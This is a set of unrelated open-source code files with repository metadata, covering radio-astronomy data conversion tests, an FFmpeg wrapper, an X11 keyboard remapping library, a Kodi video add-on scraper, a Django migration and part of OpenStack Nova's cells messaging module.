payload_nbytes=header.payload_nbytes // 2,
station=header['TELESCOPE'][:2])
def get_vdif_data(self, dada_data):
return (dada_data + 0.5 + 0.5j) / EIGHT_BIT_1_SIGMA
def get_dada_data(self, vdif_data):
return vdif_data * EIGHT_BIT_1_SIGMA - 0.5 - 0.5j
def test_header(self):
with open(SAMPLE_DADA, 'rb') as fh:
ddh = dada.DADAHeader.fromfile(fh)
# Check that we have enough information to create VDIF EDV 1 header.
header = self.get_vdif_header(ddh)
assert abs(header.time - ddh.time) < 2. * u.ns
assert header.payload_nbytes == ddh.payload_nbytes // 2
def test_payload(self):
with open(SAMPLE_DADA, 'rb') as fh:
fh.seek(4096)
ddp = dada.DADAPayload.fromfile(fh, payload_nbytes=64000,
sample_shape=(2, 1),
complex_data=True, bps=8)
dada_data = ddp.data
# Check that conversion between scalings works.
vdif_data = self.get_vdif_data(dada_data)
assert np.allclose(self.get_dada_data(vdif_data), dada_data)
# Check that we can create correct payloads.
vdif_payload0 = vdif.VDIFPayload.fromdata(vdif_data[:, 0, :], bps=8)
vdif_payload1 = vdif.VDIFPayload.fromdata(vdif_data[:, 1, :], bps=8)
vd0, vd1 = vdif_payload0.data, vdif_payload1.data
assert np.allclose(vd0, vdif_data[:, 0, :])
assert np.allclose(vd1, vdif_data[:, 1, :])
vd = np.zeros((vd0.shape[0], 2, vd0.shape[1]), vd0.dtype)
vd[:, 0] = vd0
vd[:, 1] = vd1
dd_new = self.get_dada_data(vd)
ddp2 = dada.DADAPayload.fromdata(dd_new, bps=8)
assert ddp2 == ddp
def test_stream(self, tmpdir):
with dada.open(SAMPLE_DADA, 'rs') as fr:
ddh = fr.header0
dada_data = fr.read()
offset1 = fr.tell()
stop_time = fr.tell(unit='time')
header = self.get_vdif_header(ddh)
data = self.get_vdif_data(dada_data)
assert abs(header.time - ddh.time) < 2. * u.ns
vdif_file = str(tmpdir.join('converted_dada.vdif'))
with vdif.open(vdif_file, 'ws', header0=header,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - header.time) < 2. * u.ns
# Write all data in since frameset, made of two frames.
fw.write(data)
assert (fw.tell(unit='time') - stop_time) < 2. * u.ns
assert fw.offset == offset1
with vdif.open(vdif_file, 'rs') as fv:
assert abs(fv.header0.time - ddh.time) < 2. * u.ns
dv = fv.read()
assert fv.offset == offset1
assert np.abs(fv.tell(unit='time') - stop_time) < 2.*u.ns
vh = fv.header0
vnthread = fv.sample_shape.nthread
assert np.allclose(dv, data)
# Convert VDIF file back to DADA.
dada_file = str(tmpdir.join('reconverted.dada'))
dv_data = self.get_dada_data(dv)
assert np.allclose(dv_data, dada_data)
with dada.open(dada_file, 'ws', sample_rate=vh.sample_rate,
time=vh.time, npol=vnthread, bps=vh.bps,
payload_nbytes=vh.payload_nbytes*2, nchan=vh.nchan,
telescope=vh.station,
complex_data=vh['complex_data']) as fw:
new_header = fw.header0
fw.write(dv_data)
assert self.get_vdif_header(new_header) == vh
with dada.open(dada_file, 'rs') as fh:
header = fh.header0
new_dada_data = fh.read()
assert header == new_header
assert self.get_vdif_header(header) == vh
assert np.allclose(new_dada_data, dada_data)
|
mhvk/baseband
|
baseband/tests/test_conversion.py
|
Python
|
gpl-3.0
| 19,399 | 0 |
#
# acrosby 2013
#
def __call__(nc):
s = {}
for attr in nc.ncattrs():
s[attr] = nc.getncattr(attr)
return s
|
acrosby/netcdf4-getncattrs
|
getncattrs.py
|
Python
|
mit
| 129 | 0 |
# -*- coding: UTF-8 -*-
"""
Name: generic_task.py
Porpose: Execute a generic task with FFmpeg
Compatibility: Python3 (Unix, Windows)
Author: Gianluca Pernigotto <jeanlucperni@gmail.com>
Copyright: (c) 2018/2022 Gianluca Pernigotto <jeanlucperni@gmail.com>
license: GPL3
Rev: Feb.14.2022
Code checker:
flake8: --ignore F821, W504
pylint: --ignore E0602, E1101
This file is part of Videomass.
Videomass is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Videomass is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Videomass. If not, see <http://www.gnu.org/licenses/>.
"""
from threading import Thread
import platform
import subprocess
import wx
from videomass.vdms_utils.utils import Popen
if not platform.system() == 'Windows':
import shlex
class FFmpegGenericTask(Thread):
"""
Run a generic task with FFmpeg as a separate thread.
This class does not redirect any progress output information
for debugging, however you can get the exit status message
USE:
thread = FFmpegGenericTask(args)
thread.join()
error = thread.status
if error:
print('%s' % error)
return
"""
get = wx.GetApp()
appdata = get.appset
def __init__(self, param):
"""
Attributes defined here:
self.param, a string containing the command parameters
of FFmpeg, excluding the command itself `ffmpeg`
self.status, If the exit status is true (which can be an
exception or error message given by returncode) it must be
handled appropriately, in the other case it is None.
"""
self.param = param
self.status = None
Thread.__init__(self)
self.start()
# ----------------------------------------------------------------#
def run(self):
"""
Get and redirect output errors on p.returncode instance and
OSError exception. Otherwise the getted output is None
"""
cmd = (f'"{FFmpegGenericTask.appdata["ffmpeg_cmd"]}" '
f'{FFmpegGenericTask.appdata["ffmpegloglev"]} '
f'{FFmpegGenericTask.appdata["ffmpeg+params"]} '
f'{self.param}')
if not platform.system() == 'Windows':
cmd = shlex.split(cmd)
try:
with Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True,
) as proc:
error = proc.communicate()
if proc.returncode: # ffmpeg error
if error[1]:
self.status = error[1]
else:
self.status = "Unrecognized error"
return
except OSError as err: # command not found
self.status = err
return
|
jeanslack/Videomass
|
videomass/vdms_threads/generic_task.py
|
Python
|
gpl-3.0
| 3,294 | 0 |
#!/usr/bin/env python
# coding: utf-8
from .interactiveapp import InteractiveApplication, ENCODING
class InteractiveLoopApplication(InteractiveApplication):
def __init__(self, name, desc, version,
padding, margin, suffix, encoding=ENCODING):
super(InteractiveLoopApplication, self).__init__(
name, desc, version, padding, margin, suffix, encoding)
# loop status
self.STATUS_EXIT = 0
self.STATUS_CONTINUE = 1
def loop(self, func):
def mainloop():
loop_flag = self.STATUS_CONTINUE
while loop_flag == self.STATUS_CONTINUE:
try:
loop_flag = func()
except KeyboardInterrupt:
self.write_error("Terminated.")
self.exit(0)
self.exit(0)
return mainloop
|
alice1017/coadlib
|
coadlib/loopapp.py
|
Python
|
mit
| 871 | 0 |
# This file is part of the kbremap project.
# Copyright (C) 2014 Nicolas Malarmey
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
# contact: elmamyra@gmail.com
# -*- coding: utf-8 -*-
from Xlib.display import Display
from Xlib import X, error
import Xlib
from collections import namedtuple
from gtk import gdk
import gtk
from subprocess import Popen, PIPE
from threading import Timer
from itertools import groupby
from operator import itemgetter
keyEvent = namedtuple('keyEvent', ['type', 'keycode', 'modMask'])
DEAD_KEYS = (
'grave',
'acute',
'circumflex',
'tilde',
'macron',
'breve',
'abovedot',
'diaeresis',
'ring',
'doubleacute',
'caron',
'cedilla',
'ogonek',
'belowdot',
'hook',
'horn',
'stroke',
'schwa',
'SCHWA',
)
LEVEL_MOD = (0, X.ShiftMask, X.Mod5Mask, X.ShiftMask | X.Mod5Mask, X.ControlMask | X.Mod1Mask)
class KeyTools:
KEY_PRESS = X.KeyPress
KEY_RELEASE = X.KeyRelease
def __init__(self):
self._xdisplay = Display()
self._xroot = self._xdisplay.screen().root
self._clipboard = gtk.clipboard_get()
self._clipPrimay = gtk.clipboard_get("PRIMARY")
self._entryForPaste = 118, X.ShiftMask
self._group = 0
self.loadModifiers()
self._keymap = gdk.keymap_get_default() # @UndefinedVariable
def loadModifiers(self):
self._modifiers = []
self._modifierList = []
for key in self._xdisplay.get_modifier_mapping():
li = [k for k in key if k]
#for altgr key
if 92 in li:
li.append(108)
self._modifierList += li
self._modifiers.append(li)
def filterGroup(self, entries):
if entries:
return [e for e in entries if e[-2] == self._group]
return []
def remapKey(self, keycode, keysyms):
allKeysyms = list(self._xdisplay.get_keyboard_mapping(keycode, 1)[0])
keysyms = keysyms + [0]*(4 - len(keysyms))
allKeysyms[:2] = keysyms[:2]
allKeysyms[4:6] = keysyms[2:]
self._xdisplay.change_keyboard_mapping(keycode, [allKeysyms])
self._xdisplay.sync()
def resetMapping(self):
try:
process = Popen('setxkbmap -print -verbose 7'.split(), stdout=PIPE, stderr=PIPE)
except OSError:
print 'install setxkbmap'
for line in process.stderr:
print 'setxkbmap error: {}'.format(line)
layout = variant = ''
for line in process.stdout:
line = line.rstrip()
if line == '':
break
if line.startswith('layout:'):
layout = line.split()[1]
elif line.startswith('variant:'):
variant = line.split()[1]
break
command = ['setxkbmap']
if layout:
command += ['-layout', layout]
if variant:
command += ['-variant', variant]
if layout or command:
try:
process = Popen(command, stdout=PIPE, stderr=PIPE)
except OSError:
print 'install setxkbmap'
for line in process.stderr:
print 'setxkbmap error: {}'.format(line)
def isModifier(self, keycode):
return keycode in self._modifierList
def getModMask(self, keycode):
for i, mods in enumerate(self._modifiers):
if keycode in mods:
return 2**i
return 0
def modifiersKeycodeList(self):
return self._modifierList
def numMask(self):
return X.Mod2Mask
def keycode2char(self, keycode, mods, group=0):
char = ''
name = ''
info = self._keymap.translate_keyboard_state(keycode, mods, group)
if info:
keysym = info[0]
char = gdk.keyval_to_unicode(keysym) # @UndefinedVariable
if char:
char = unichr(char)
name = gdk.keyval_name(keysym) # @UndefinedVariable
return char or '', name or ''
def removeNumLockMask(self, keycode, mod):
if not self.isKeypadKey(keycode) and mod & X.Mod2Mask:
return mod ^ X.Mod2Mask
return mod
def entry2keysym(self, keycode, modMask):
info = self._keymap.translate_keyboard_state(keycode, modMask, self._group)
if info:
return info[0]
return None
def entry2name(self, keycode, modMask):
keysym = self.entry2keysym(keycode, modMask)
if keysym is not None:
return gdk.keyval_name(keysym) # @UndefinedVariable
return None
def keycode2entries(self, keycode):
return self.filterGroup(self._keymap.get_entries_for_keycode(keycode))
def keysym2entry(self, keysym):
if not keysym:
return None
infos = self._keymap.get_entries_for_keyval(keysym) # @UndefinedVariable
if infos:
for info in infos:
keycode, group, level = info
if group == self._group:
if level < len(LEVEL_MOD):
mod = LEVEL_MOD[level]
return keycode, mod
return None
def keysym2deadEntries(self, keysym):
resp = ()
entry = self.keysym2entry(keysym)
if entry:
keycode, mod = entry
resp = ((keycode, mod), )
if not resp:
deadKeys = self.findWithDeadKey(keysym)
if deadKeys:
keyKeysym, deadKeysym = deadKeys
keyKeycodes = self.keysym2entry(keyKeysym)
deadKeycodes = self.keysym2entry(deadKeysym)
if keyKeycodes and deadKeycodes:
keyKeycode, keyMod = keyKeycodes
deadKeycode, deadMod = deadKeycodes
resp = ((deadKeycode, deadMod), (keyKeycode, keyMod))
return resp
def keycode2charsAndNames(self, keycode):
entries = self.keycode2entries(keycode)
chars = []
names = []
for entry in entries:
chars.append(keysym2char(entry[0]))
names.append(keysym2name(entry[0]))
if len(chars) >= 4:
break
while not names[-1]:
chars.pop(-1)
names.pop(-1)
return chars, names
def keycode2keysyms(self, keycode):
entries = self.keycode2entries(keycode)
return [e[0] for e in entries][:4]
def char2entries(self, char):
keysym = gdk.unicode_to_keyval(ord(char)) # @UndefinedVariable
if keysym:
return self.keysym2deadEntries(keysym)
return ()
def findWithDeadKey(self, keysym):
name = gdk.keyval_name(keysym) # @UndefinedVariable
for deadName in DEAD_KEYS:
if name.endswith(deadName):
keyName = name[:-len(deadName)]
deadName = {'ring': 'abovering',
'schwa': 'small_schwa',
'SCHWA': 'capital_schwa'}.get(deadName, deadName)
deadName = 'dead_' + deadName
keyKeysym = gdk.keyval_from_name(keyName) # @UndefinedVariable
deadSym = gdk.keyval_from_name(deadName) # @UndefinedVariable
return keyKeysym, deadSym
return None
def isKeypadKey(self, keycode):
entry = self._keymap.get_entries_for_keycode(keycode)
if entry:
for info in entry:
if info[2] == self._group:
name = gdk.keyval_name(info[0]) # @UndefinedVariable
if name and name.startswith('KP_'):
return True
return False
def grabKey(self, keycode, modMask):
self._xroot.grab_key(keycode, modMask, 0, X.GrabModeAsync, X.GrabModeAsync)
if not self.isKeypadKey(keycode) and not modMask & X.Mod2Mask:
self._xroot.grab_key(keycode, modMask | X.Mod2Mask, 0, X.GrabModeAsync, X.GrabModeAsync)
def ungrabKey(self, keycode, modMask):
self._xroot.ungrab_key(keycode, modMask)
if not self.isKeypadKey(keycode) and not modMask & X.Mod2Mask:
self._xroot.ungrab_key(keycode, modMask | X.Mod2Mask)
def nextKeyEvent(self, typ=KEY_PRESS):
if isinstance(typ, int):
typ = (typ,)
num = self._xdisplay.pending_events()
if num:
for _ in range(num):
event = self._xdisplay.next_event()
if event.type in typ:
return keyEvent(event.type, event.detail, event.state)
self._xdisplay.allow_events(X.AsyncKeyboard, X.CurrentTime)
return None
def slotClipboard(self, clipboard, text, backup):
self.sendEntry(*self._entryForPaste)
t = Timer(0.1, self.restoreClipboard, (backup,))
t.start()
def restoreClipboard(self, backup):
self._clipboard.request_text(lambda a, b, c: None)
if backup:
self._clipboard.set_text(backup or '')
self._clipPrimay.clear()
self._clipboard.store()
def sendText(self, text):
backup = self._clipboard.wait_for_text()
self._clipboard.set_text(text)
self._clipPrimay.set_text(text)
self._clipboard.request_text(self.slotClipboard, backup)
self._clipboard.store()
self._clipPrimay.store()
def sendKeysym(self, keysym):
entries = self.keysym2deadEntries(keysym)
for entry in entries:
self.sendEntry(*entry)
def sendEntry(self, keycode, mod):
self.pressKey(keycode, mod)
self.releaseKey(keycode, mod)
def pressKey(self, keycode, modMask):
window = self._xdisplay.get_input_focus()._data["focus"]
evt = Xlib.protocol.event.KeyPress( # @UndefinedVariable
time = X.CurrentTime,
root = self._xroot,
window = window,
same_screen = 0, child = Xlib.X.NONE,
root_x = 0, root_y = 0, event_x = 0, event_y = 0,
state = modMask,
detail = keycode
)
window.send_event(evt, propagate = True)
def releaseKey(self, keycode, modMask):
window = self._xdisplay.get_input_focus()._data["focus"]
evt = Xlib.protocol.event.KeyRelease( # @UndefinedVariable
time = X.CurrentTime,
root = self._xroot,
window = window,
same_screen = 0, child = Xlib.X.NONE,
root_x = 0, root_y = 0, event_x = 0, event_y = 0,
state = modMask,
detail = keycode
)
window.send_event(evt, propagate = True)
def name2unicode(name):
keysym = gdk.keyval_from_name(name) # @UndefinedVariable
return gdk.keyval_to_unicode(keysym) # @UndefinedVariable
def name2keysym(name):
return gdk.keyval_from_name(name) # @UndefinedVariable
def keysym2name(keysym):
try:
return gdk.keyval_name(keysym) or "" # @UndefinedVariable
except:
return ""
def keysym2char(keysym):
char = gdk.keyval_to_unicode(keysym) # @UndefinedVariable
return unichr(char) if char else ""
def name2Char(name):
char = name2unicode(name)
if char:
char = unichr(char)
return char or ''
|
elmamyra/kbremap
|
kbremap_app/keyTools/__init__.py
|
Python
|
gpl-3.0
| 12,391 | 0.011137 |
from cx_Freeze import setup, Executable
# Dependencies are automatically detected, but it might need
# fine tuning.
buildOptions = dict(packages = ["pyglet", "polytanks", "codecs", "encodings", "selectors"],
excludes = ["tkinter", "PyQt5", "PIL", "setuptools"]
, include_files="assets")
import sys
base = 'Win32GUI' if sys.platform=='win32' else None
executables = [
Executable('main.py', base=base, targetName = 'cliente.exe')
]
setup(name='polytanks-cliente',
version = '1.0',
description = 'Cliente de Polytanks',
options = dict(build_exe = buildOptions),
executables = executables)
|
dotoscat/Polytank-ASIR
|
client_setup.py
|
Python
|
agpl-3.0
| 626 | 0.033546 |
import urllib,re,sys,os
import xbmc,xbmcgui,xbmcaddon,xbmcplugin
from resources.libs import main
#Mash Up - by Mash2k3 2012.
addon_id = 'plugin.video.movie25'
selfAddon = xbmcaddon.Addon(id=addon_id)
art = main.art
def LISTSP(murl):
#urllist=main.OPENURL('http://oneclickwatch.org/category/movies/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/2/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/3/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/4/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/5/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/6/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/7/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/8/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/9/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/10/')
urllist=main.batchOPENURL(('http://oneclickwatch.org/category/movies/','http://oneclickwatch.org/category/movies/page/2/','http://oneclickwatch.org/category/movies/page/3/','http://oneclickwatch.org/category/movies/page/4/','http://oneclickwatch.org/category/movies/page/5/','http://oneclickwatch.org/category/movies/page/6/','http://oneclickwatch.org/category/movies/page/7/','http://oneclickwatch.org/category/movies/page/8/','http://oneclickwatch.org/category/movies/page/9/','http://oneclickwatch.org/category/movies/page/10/'))
if urllist:
urllist=main.unescapes(urllist)
match=re.compile('<a href="([^<]+)" title=".+?".+? src="(.+?)" .+?/><br />(.+?)<br />').findall(urllist)
dialogWait = xbmcgui.DialogProgress()
ret = dialogWait.create('Please wait until Movie list is cached.')
totalLinks = len(match)
loadedLinks = 0
remaining_display = 'Movies loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(0,'[B]Will load instantly from now on[/B]',remaining_display)
for url,thumb,name in match:
name=name.replace('<strong>','').replace('</strong>','')
main.addPlayM(name,url,135,thumb,'','','','','')
loadedLinks = loadedLinks + 1
percent = (loadedLinks * 100)/totalLinks
remaining_display = 'Movies loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
if (dialogWait.iscanceled()):
return False
dialogWait.close()
del dialogWait
main.CloseAllDialogs()
main.GA("HD","Oneclickwatch")
def LISTTV3(murl):
#urllist=main.OPENURL('http://oneclickwatch.org/category/tv-shows/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/2/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/3/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/4/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/5/')
urllist=main.batchOPENURL(('http://oneclickwatch.org/category/tv-shows/','http://oneclickwatch.org/category/tv-shows/page/2/','http://oneclickwatch.org/category/tv-shows/page/3/','http://oneclickwatch.org/category/tv-shows/page/4/','http://oneclickwatch.org/category/tv-shows/page/5/'))
if urllist:
urllist=main.unescapes(urllist)
match=re.compile('title=".+?">([^<]+)</a></h2>.+?href=".+?<a href="(.+?)" .+?href=".+?>.+?src="(.+?)"').findall(urllist)
dialogWait = xbmcgui.DialogProgress()
ret = dialogWait.create('Please wait until Show list is cached.')
totalLinks = len(match)
loadedLinks = 0
remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(0,'[B]Will load instantly from now on[/B]',remaining_display)
for name,url,thumb in match:
name=name.replace('\xc2\xa0','').replace('" ','').replace(' "','').replace('"','').replace("'","'").replace("&","and").replace("’","'").replace("amp;","and").replace("#8211;","-")
main.addPlayTE(name,url,134,thumb,'','','','','')
loadedLinks = loadedLinks + 1
percent = (loadedLinks * 100)/totalLinks
remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
if (dialogWait.iscanceled()):
return False
dialogWait.close()
del dialogWait
main.GA("TV","Oneclickwatch")
def PLAYOCW(mname,murl):
sources=[]
main.GA("OneclickwatchT","Watched")
ok=True
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Collecting Hosts,5000)")
link=main.OPENURL(murl)
link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','')
match=re.compile('<p><a href=".+?" rel=".+?">(.+?)</a></p>').findall(link)
desc=re.compile('<.+? />Plot:(.+?)<.+? />').findall(link)
if len(desc)>0:
descs=desc[0]
else:
descs=''
thumb=re.compile('<img alt="" src="(.+?)"').findall(link)
if len(thumb)>0:
thumbs=thumb[0]
else:
thumbs=''
main.CloseAllDialogs()
import urlresolver
for url in match:
host=re.compile("http://(.+?).com/.+?").findall(url)
for hname in host:
host=hname.replace('www.','')
hosted_media = urlresolver.HostedMediaFile(url=url, title=host)
sources.append(hosted_media)
if (len(sources)==0):
xbmc.executebuiltin("XBMC.Notification(Sorry!,Show doesn't have playable links,5000)")
else:
source = urlresolver.choose_source(sources)
try:
if source:
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Resolving Link,3000)")
stream_url = main.resolve_url(source.get_url())
else:
stream_url = False
return
infoLabels =main.GETMETAEpiT(mname,thumbs,descs)
video_type='episode'
season=infoLabels['season']
episode=infoLabels['episode']
img=infoLabels['cover_url']
fanart =infoLabels['backdrop_url']
imdb_id=infoLabels['imdb_id']
infolabels = { 'supports_meta' : 'true', 'video_type':video_type, 'name':str(infoLabels['title']), 'imdb_id':str(infoLabels['imdb_id']), 'season':str(season), 'episode':str(episode), 'year':str(infoLabels['year']) }
infoL={'Title': infoLabels['title'], 'Plot': infoLabels['plot'], 'Genre': infoLabels['genre']}
# play with bookmark
player = playbackengine.PlayWithoutQueueSupport(resolved_url=stream_url, addon_id=addon_id, video_type=video_type, title=str(infoLabels['title']),season=str(season), episode=str(episode), year=str(infoLabels['year']),img=img,infolabels=infoL, watchedCallbackwithParams=main.WatchedCallbackwithParams,imdb_id=imdb_id)
#WatchHistory
if selfAddon.getSetting("whistory") == "true":
wh.add_item(mname+' '+'[COLOR green]Oneclickwatch[/COLOR]', sys.argv[0]+sys.argv[2], infolabels=infolabels, img=img, fanart=fanart, is_folder=False)
player.KeepAlive()
return ok
except:
return ok
def VIDEOLINKST3(mname,murl):
sources=[]
main.GA("OneclickwatchM","Watched")
ok=True
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Collecting Hosts,5000)")
link=main.OPENURL(murl)
link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','')
match=re.compile('<p><a href="([^"]+?)".*?>().+?</a></p>').findall(link)
if len(match)==0:
match=re.compile('<a href="(.+?)">(.+?)</a><br />').findall(link)
desc=re.compile('<.+? />Plot:(.+?)<.+? />').findall(link)
if len(desc)>0:
descs=desc[0]
else:
descs=''
thumb=re.compile('<img alt="" src="(.+?)"').findall(link)
if len(thumb)>0:
thumbs=thumb[0]
else:
thumbs=''
main.CloseAllDialogs()
import urlresolver
for url,host in match:
print url
hosted_media = urlresolver.HostedMediaFile(url=url, title=host)
sources.append(hosted_media)
if (len(sources)==0):
xbmc.executebuiltin("XBMC.Notification(Sorry!,Show doesn't have playable links,5000)")
else:
source = urlresolver.choose_source(sources)
try:
if source:
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Resolving Link,3000)")
stream_url = main.resolve_url(source.get_url())
else:
stream_url = False
return
print stream_url
infoLabels =main.GETMETAT(mname,'','',thumbs)
video_type='movie'
season=''
episode=''
img=infoLabels['cover_url']
fanart =infoLabels['backdrop_url']
imdb_id=infoLabels['imdb_id']
infolabels = { 'supports_meta' : 'true', 'video_type':video_type, 'name':str(infoLabels['title']), 'imdb_id':str(infoLabels['imdb_id']), 'season':str(season), 'episode':str(episode), 'year':str(infoLabels['year']) }
infoL={'Title': infoLabels['title'], 'Plot': infoLabels['plot'], 'Genre': infoLabels['genre']}
# play with bookmark
from resources.universal import playbackengine
player = playbackengine.PlayWithoutQueueSupport(resolved_url=stream_url, addon_id=addon_id, video_type=video_type, title=str(infoLabels['title']),season=str(season), episode=str(episode), year=str(infoLabels['year']),img=img,infolabels=infoL, watchedCallbackwithParams=main.WatchedCallbackwithParams,imdb_id=imdb_id)
#WatchHistory
if selfAddon.getSetting("whistory") == "true":
from resources.universal import watchhistory
wh = watchhistory.WatchHistory('plugin.video.movie25')
wh.add_item(mname+' '+'[COLOR green]Oneclickwatch[/COLOR]', sys.argv[0]+sys.argv[2], infolabels='', img=img, fanart='', is_folder=False)
player.KeepAlive()
return ok
except Exception, e:
if stream_url != False:
main.ErrorReport(e)
return ok
|
marduk191/plugin.video.movie25
|
resources/libs/movies_tv/oneclickwatch.py
|
Python
|
gpl-3.0
| 11,474 | 0.022486 |
import sys
def addAbilities(core, actor, player):
if actor.getLevel() >= 10:
actor.addAbility("sp_cloaked_recovery_0")
if actor.getLevel() >= 28:
actor.addAbility("sp_cloaked_recovery_1")
if actor.getLevel() >= 54:
actor.addAbility("sp_cloaked_recovery_2")
if actor.getLevel() >= 70:
actor.addAbility("sp_cloaked_recovery_3")
if actor.getLevel() >= 86:
actor.addAbility("sp_cloaked_recovery_4")
return
def removeAbilities(core, actor, player):
actor.removeAbility("sp_cloaked_recovery_0")
actor.removeAbility("sp_cloaked_recovery_1")
actor.removeAbility("sp_cloaked_recovery_2")
actor.removeAbility("sp_cloaked_recovery_3")
actor.removeAbility("sp_cloaked_recovery_4")
return
|
agry/NGECore2
|
scripts/expertise/expertise_sp_cloaked_recovery_1.py
|
Python
|
lgpl-3.0
| 700 | 0.027143 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-01 13:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('forum', '0004_activity_brick_name'),
]
operations = [
migrations.AddField(
model_name='activity',
name='target_id',
field=models.PositiveSmallIntegerField(default=0, null=True),
),
migrations.AddField(
model_name='activity',
name='target_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType'),
),
]
|
igemsoftware2017/USTC-Software-2017
|
biohub/forum/migrations/0005_auto_20171001_2105.py
|
Python
|
gpl-3.0
| 799 | 0.001252 |
# Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Cell messaging module.
This module defines the different message types that are passed between
cells and the methods that they can call when the target cell has been
reached.
The interface into this module is the MessageRunner class.
"""
import sys
import traceback
from eventlet import queue
from oslo.config import cfg
from oslo import messaging
import six
from nova.cells import state as cells_state
from nova.cells import utils as cells_utils
from nova import compute
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import vm_states
from nova.consoleauth import rpcapi as consoleauth_rpcapi
from nova import context
from nova.db import base
from nova import exception
from nova.network import model as network_model
from nova.objects import base as objects_base
from nova.objects import instance as instance_obj
from nova.objects import instance_fault as instance_fault_obj
from nova.openstack.common import excutils
from nova.openstack.common.gettextutils import _
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova import rpc
from nova import utils
cell_messaging_opts = [
cfg.IntOpt('max_hop_count',
default=10,
help='Maximum number of hops for cells routing.'),
cfg.StrOpt('scheduler',
default='nova.cells.scheduler.CellsScheduler',
help='Cells scheduler to use')]
CONF = cfg.CONF
CONF.import_opt('name', 'nova.cells.opts', group='cells')
CONF.import_opt('call_timeout', 'nova.cells.opts', group='cells')
CONF.register_opts(cell_messaging_opts, group='cells')
LOG = logging.getLogger(__name__)
# Separator used between cell names for the 'full cell name' and routing
# path.
_PATH_CELL_SEP = cells_utils.PATH_CELL_SEP
def _reverse_path(path):
"""Reverse a path. Used for sending responses upstream."""
path_parts = path.split(_PATH_CELL_SEP)
path_parts.reverse()
return _PATH_CELL_SEP.join(path_parts)
def _response_cell_name_from_path(routing_path, neighbor_only=False):
"""Reverse the routing_path. If we only want to send to our parent,
set neighbor_only to True.
"""
path = _reverse_path(routing_path)
if not neighbor_only or len(path) == 1:
return path
return _PATH_CELL_SEP.join(path.split(_PATH_CELL_SEP)[:2])
#
# Message classes.
#
class _BaseMessage(object):
"""Base message class. It defines data that is passed with every
single message through every cell.
Messages are JSON-ified before sending and turned back into a
class instance when being received.
Every message has a unique ID. This is used to route responses
back to callers. In the future, this might be used to detect
receiving the same message more than once.
routing_path is updated on every hop through a cell. The current
cell name is appended to it (cells are separated by
_PATH_CELL_SEP ('!')). This is used to tell if we've reached the
target cell and also to determine the source of a message for
responses by reversing it.
hop_count is incremented and compared against max_hop_count. The
only current usefulness of this is to break out of a routing loop
if someone has a broken config.
fanout means to send to all nova-cells services running in a cell.
This is useful for capacity and capability broadcasting as well
as making sure responses get back to the nova-cells service that
is waiting.
"""
# Override message_type in a subclass
message_type = None
base_attrs_to_json = ['message_type',
'ctxt',
'method_name',
'method_kwargs',
'direction',
'need_response',
'fanout',
'uuid',
'routing_path',
'hop_count',
'max_hop_count']
def __init__(self, msg_runner, ctxt, method_name, method_kwargs,
direction, need_response=False, fanout=False, uuid=None,
